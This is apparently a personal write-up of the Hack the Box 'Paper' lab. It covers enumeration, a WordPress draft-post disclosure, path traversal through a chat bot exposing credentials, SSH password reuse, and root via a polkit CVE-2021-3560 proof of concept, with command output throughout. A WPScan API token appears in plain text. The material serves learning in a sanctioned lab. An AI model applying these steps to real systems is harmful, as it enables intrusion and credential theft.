Hack the Box — Paper
I did this box some time ago and, it wasn’t as easy as I thought, although that was probably more because of my rush to get the flags and points to move up a level in HTB. The other reason I wanted to do it again, was on those long night-shifts, I watched Alh4zr3d’s video walk-through and remembered how good it was. Based on the American Office, what else could you ask for!
So let’s get started, with the usual enumeration:
ping
ping -c 4 $IP
PING 10.129.136.31 (10.129.136.31) 56(84) bytes of data.
64 bytes from 10.129.136.31: icmp_seq=1 ttl=63 time=8.75 ms
64 bytes from 10.129.136.31: icmp_seq=2 ttl=63 time=8.48 ms
64 bytes from 10.129.136.31: icmp_seq=3 ttl=63 time=8.33 ms
64 bytes from 10.129.136.31: icmp_seq=4 ttl=63 time=8.08 ms--- 10.129.136.31 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 8.076/8.408/8.746/0.243 ms
nmap
~ nmap -sCV -A $IP -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-23 10:08 BST
Nmap scan report for 10.129.136.31
Host is up (0.017s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
| 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
| http-methods:
|_ Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after: 2022-07-08T10:32:34
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| tls-alpn:
|_ http/1.1Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.92 seconds
gobuster
~ gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.136.31
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/08/23 10:08:53 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/manual (Status: 301) [Size: 236] [--> http://10.129.136.31/manual/]
===============================================================
2022/08/23 10:09:01 Finished
===============================================================Gobuster didn’t much up on the first scan so I used feroxbuster that went a tadge mad, to say the least!!
~ feroxbuster --url http://$IP --depth 2 --wordlist /usr/share/wordlists/wfuzz/general/megabeast.txt -e___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.7.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://10.129.136.31
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/wfuzz/general/megabeast.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.7.1
💉 Config File │ /home/karti/.config/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 2
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
200 GET 4l 13w 643c http://10.129.136.31/icons/poweredby.png
200 GET 27l 138w 5714c http://10.129.136.31/poweredby.png
403 GET 70l 2438w 199691c http://10.129.136.31/
200 GET 3l 18w 332c http://10.129.136.31/icons/index.png
200 GET 3l 21w 277c http://10.129.136.31/icons/pie5.png
200 GET 1l 13w 198c http://10.129.136.31/icons/pie1.gif
200 GET 2l 3w 131c http://10.129.136.31/icons/small/binhex.gif
Normally I use this to indicate that a change to /etc/hosts may be required. Nothing was shown in the nmap scan, other than localhost.localdomain so a quick check on the site headers with curl, gave an answer:
~ curl --head http://$IP
HTTP/1.1 403 Forbidden
Date: Tue, 23 Aug 2022 09:12:46 GMT
Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
X-Backend-Server: office.paper
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8So looking at the backend-server we can see office.paper a quick amendment in our host files should help.
127.0.0.1 localhost
127.0.1.1 kaliCTF
10.129.136.31 office.paper# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
So running gobuster a second time we have a bit more success, with some indications that we have a WordPress site:
===============================================================
/.hta (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/cgi-bin/ (Status: 403) [Size: 199]
/index.php (Status: 301) [Size: 1] [--> http://office.paper/]
/manual (Status: 301) [Size: 235] [--> http://office.paper/manual/]
/wp-admin (Status: 301) [Size: 237] [--> http://office.paper/wp-admin/]
/wp-content (Status: 301) [Size: 239] [--> http://office.paper/wp-content/]
/wp-includes (Status: 301) [Size: 240] [--> http://office.paper/wp-includes/]
===============================================================website
Going through the usual button clicking, checking links and other such wonderful enumeration processes, we find that it is running a blog with a number of posts, that could indicate a number of users:
- Prisonmike
- nick
- Creed Bratton
All characters from the series. One of the comments from Nick did stand out:
Possible way in? So far we have not enumerated WordPress. Let’s see what it gives us.
~ wpscan --url http://office.paper --api-token nWR63QdtvFSaOBYXjRz2b2bFRZEYQ7QoL82juJHYsQQ
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://office.paper/ [10.129.136.31]
[+] Started: Tue Aug 23 11:03:28 2022Interesting Finding(s):[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
| - X-Powered-By: PHP/7.2.24
| - X-Backend-Server: office.paper
| Found By: Headers (Passive Detection)
| Confidence: 100%
[!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 5.2.4
| References:
| - https://wpscan.com/vulnerability/3413b879-785f-4c9f-aa8a-5a4a1d5e0ba2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.com/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
Having just seen the comment from nick on the drafts, we see that there is an available exploit to see Prisonmike’s draft posts. Checking the wpscan wed link we get the information required:
Trying with the order=asc gave us a 404 page error, so I removed it keeping the static=1 which provided us with Prisonmike’s draft comments.
This provided us with a sub-domain of chat. Adding this to out host file allowed us to access the registration page.
Having registered we now have access to the office chat app.
We see that it has a bot running and it’s name is Recyclops — another chapter from the series, where Dwight plays the actual character. The room itself is read only, but we can start a direct message with Recyclops.
So using the commands from the original team chat, we can ask specific questions. Let’s see if we can Local File Inclusion (LFI):
So that works. Checking what users were available in home we see only dwight. Checking his files, I notice that hubot (and I made an assumption that it was part of the Recyclops program) provided us with an environmental file .env
<!=====Contents of file ../../../../../home/dwight/hubot/.env=====>
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Que********3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1
<!=====End of file ../../../../../home/dwight/hubot/.env=====>This gave us a password and username. Perhaps he used the same password?
~ ssh dwight@$IP
The authenticity of host '10.129.136.31 (10.129.136.31)' can't be established.
ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.136.31' (ED25519) to the list of known hosts.
dwight@10.129.136.31's password:
Activate the web console with: systemctl enable --now cockpit.socketLast login: Tue Feb 1 09:14:33 2022 from 10.10.14.23
[dwight@paper ~]$
A quick check proved he did!! So now we have the user flag:
8bc3*******************49948d18
privilege escalation
So checking sudo -l and for sudi we don’t get much, with dwight unable to run sudo. A quick transfer of linpeas brings us the good news that it is actually vulnerable to CVE-2021–3560
Some research brings up the details of the exploit and a script to actually gain root.
So copying the poc.sh and pasting it into the target /tmp folder:
We make it executable and then run it.
[dwight@paper tmp]$ ./poc.sh -p=password[!] Username set as : secnigma
[!] No Custom Timing specified.
[!] Timing will be detected Automatically
[!] Force flag not set.
[!] Vulnerability checking is ENABLED!
[!] Starting Vulnerability Checks...
[!] Checking distribution...
[!] Detected Linux distribution as "centos"
[!] Checking if Accountsservice and Gnome-Control-Center is installed
[+] Accounts service and Gnome-Control-Center Installation Found!!
[!] Checking if polkit version is vulnerable
[+] Polkit version appears to be vulnerable!!
[!] Starting exploit...
[!] Inserting Username secnigma...
Error org.freedesktop.Accounts.Error.PermissionDenied: Authentication is required
[+] Inserted Username secnigma with UID 1005!
[!] Inserting password hash...
[!] It looks like the password insertion was succesful!
[!] Try to login as the injected user using su - secnigma
[!] When prompted for password, enter your password
[!] If the username is inserted, but the login fails; try running the exploit again.
[!] If the login was succesful,simply enter 'sudo bash' and drop into a root shell!
[dwight@paper tmp]$ su secnigma
Password:
[secnigma@paper tmp]$ sudo bash
[sudo] password for secnigma:
[root@paper tmp]# id
uid=0(root) gid=0(root) groups=0(root)
[root@paper tmp]# cat /root/root.txt
a6a1b5a********************c1d22
[root@paper tmp]#
As mentioned in the POC readme file, this took a few attempts to work. However, when it did, it gave us straight access to root and the flag.
An enjoyable challenge, that was much better the second time around. As a side note the box creator secnigma actually provided the github POC to exploit the target.